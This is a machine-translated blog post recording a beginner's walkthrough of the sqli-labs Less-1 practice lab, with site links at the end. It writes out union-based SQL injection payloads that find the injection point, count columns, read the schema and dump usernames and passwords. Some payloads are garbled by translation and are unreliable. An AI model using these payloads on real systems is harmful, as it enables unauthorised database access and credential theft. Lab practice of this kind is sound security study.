White inject learning to learn: sqli-labs - less1 learning record

Others 2020-03-25 02:59:46 views: null

Sqli-labs ----- Less1 character injection: union joint inquiry injection

1. Analyzing the injection point, the injection type
(1) 'according to the database after error message, suppose the content stored in the id which has single quotation marks later in accordance with the input id
(2) Enter' and 1 = 1 - + returned content found normal (white Note: - + content back sql statement)
input 'and 1 = 2 - + returns an error, the presence confirmation id injection vulnerability herein
2.order by query columns
according to order by - + query found there are three current form. (White Note: Here guessing can take up an intermediate value method)
3. Get the database name
used in combination union select query to query the database name
id = -1 'union select 1,2,3 -see page echo? content, there are columns 2 and 3 respectively.
? id = -1 'union select 1,2name of the database security can be obtained in the position of the 3
(white Note: database () function returns the current database name in the database, there is a similar function version () returns the current version of the database, current_user () returns mysql user name and host name)
4. Get table
id = -1 'union select 1,2,- +
table has users, emails, referers, uagents, users are apparently required a user table.
5. Obtain field name
? ID = -1 'SELECT 1,2 Union, GROUP_CONCAT (column_name) from table_name WHERE from information_schema.columns =' Users '- +
6. The account acquisition username password password
ID = -1?' Union SELECT 1,2, GROUP_CONCAT ( username, '~', password) from users - + ( white Note: - number will be used here spaced account password)

PS: white Notes
(1) .information_schema can be seen as information database, in which there are several read-only table holds all the other data in the MySQL server, such as database names, table names.
(2) .information_schema tables in the database table provides information about the table; colunms provides information table column
(3) .group_concat () action is a result of all corresponding fields of the query returns a combination of a record, in the present Example query username and password all results in
(4). now if there are injection points according to 'and the error information determination determines character or numeric injection
with order by query column number, echo information re-query according union select a step access to the database name, table names, field names, field content.

 

White recorded injected learn! !

 

Guess you like

Origin www.cnblogs.com/ersuani/p/12563563.html
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com